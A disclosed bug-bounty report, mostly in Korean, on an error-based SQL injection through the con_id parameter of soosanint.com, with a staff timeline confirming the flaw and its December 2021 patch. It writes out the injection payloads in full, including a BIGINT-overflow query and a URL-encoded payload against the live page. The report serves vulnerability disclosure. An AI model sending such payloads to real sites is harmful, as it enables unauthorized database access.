SQL injection attacks cause an overflow error BIGINT

Writer grooveshark Program 수산아이앤티

WEB Resolved Critical No Reward Created: Oct 27, 2021 (3 years ago) Last Updated: Dec 30, 2021 (3 years ago)

Weakness

SQL injection attacks cause an overflow error BIGINT

Description

개요

SQL Injection

재현 과정

[취약점 재현을 하기 위한 과정을 서술해 주세요]
https://www.soosanint.com/contents.php?con_id=%27%20OR%20(select(!x-~0)from(select(selectuser())x)a)–%20-

취약한 파라미터)
con_id

삽입한 쿼리)
’ AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178717071,(SELECT (ELT(3480=3480,1))),0x716a767871,0x78))s), 8446744073709551610, 8446744073709551610)))-- pgkD -
%27%20OR%20(select(!x-~0)from(select(selectuser())x)a)–%20-

  1. [step2]
  2. [step3]

예상되는 취약점 발생 원인

SQL 쿼리 실행

패치 방법

특수문자 필터링 및 prepared statement 적용

예상 결과 및 파급력

SQL 쿼리 실행

기타사항 및 레퍼런스

Description
Description

Timeline

grooveshark submitted ticket. October 27, 2021 (3 years ago)
grooveshark posted a comment. October 31, 2021 (3 years ago)

URL)
https://www.soosanint.com/contents.php?con_id=%27%20OR%20(select(!x-~0)from(select(selectuser())x)a)–±

Dona BUGCAMP STAFF changed the status from 'Submitted' to 'In Progress'. November 11, 2021 (3 years ago)
Steve BUGCAMP STAFF posted a comment. November 12, 2021 (3 years ago)

안녕하세요. 제보자님
수산아이앤티 버그바운티 프로그램에 제보해주셔서 감사합니다.

제출해주신 티켓은 유효한 티켓으로 Error based SQL Injection 취약점이 발현되는 것을 확인하였습니다. 해당 티켓은 담당자에게 전달될 예정이며, 담당자 업무 일정으로 인해 패치가 지연될 수 있는점 참고부탁드립니다.

감사합니다.

Steve BUGCAMP STAFF changed the status from 'In Progress' to 'Resolved'. December 30, 2021 (3 years ago)

안녕하세요. 제보자님 제보해주신 SQL injection 취약점이 패치되었습니다. 수산아이앤티 버그바운티 프로그램에 참여해주셔서 감사합니다.

Steve BUGCAMP STAFF changed the disclosure from 'Closed' to 'Disclosed (Full)'. December 30, 2021 (3 years ago)